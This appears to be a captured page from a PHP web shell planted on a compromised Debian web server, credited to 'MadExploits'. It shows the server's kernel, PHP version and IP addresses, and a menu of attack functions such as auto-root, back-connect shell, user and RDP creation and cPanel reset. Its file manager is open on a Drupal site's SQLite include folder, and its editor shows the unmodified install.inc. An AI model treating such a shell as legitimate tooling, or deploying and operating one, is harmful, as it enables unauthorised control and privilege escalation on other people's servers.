Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.119.132.80
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
includes /
database /
sqlite /
[ HOME SHELL ]
Name
Size
Permission
Action
database.inc
17.5
KB
-rw-r--r--
install.inc
1.67
KB
-rw-r--r--
query.inc
4.3
KB
-rw-r--r--
schema.inc
22.85
KB
-rw-r--r--
select.inc
404
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : install.inc
<?php /** * @file * SQLite specific install functions */ class DatabaseTasks_sqlite extends DatabaseTasks { protected $pdoDriver = 'sqlite'; public function name() { return st('SQLite'); } /** * Minimum engine version. * * @todo: consider upping to 3.6.8 in Drupal 8 to get SAVEPOINT support. */ public function minimumVersion() { return '3.3.7'; } public function getFormOptions($database) { $form = parent::getFormOptions($database); // Remove the options that only apply to client/server style databases. unset($form['username'], $form['password'], $form['advanced_options']['host'], $form['advanced_options']['port']); // Make the text more accurate for SQLite. $form['database']['#title'] = st('Database file'); $form['database']['#description'] = st('The absolute path to the file where @drupal data will be stored. This must be writable by the web server and should exist outside of the web root.', array('@drupal' => drupal_install_profile_distribution_name())); $default_database = conf_path(FALSE, TRUE) . '/files/.ht.sqlite'; $form['database']['#default_value'] = empty($database['database']) ? $default_database : $database['database']; return $form; } public function validateDatabaseSettings($database) { // Perform standard validation. $errors = parent::validateDatabaseSettings($database); // Verify the database is writable. $db_directory = new SplFileInfo(dirname($database['database'])); if (!$db_directory->isWritable()) { $errors[$database['driver'] . '][database'] = st('The directory you specified is not writable by the web server.'); } return $errors; } }
Close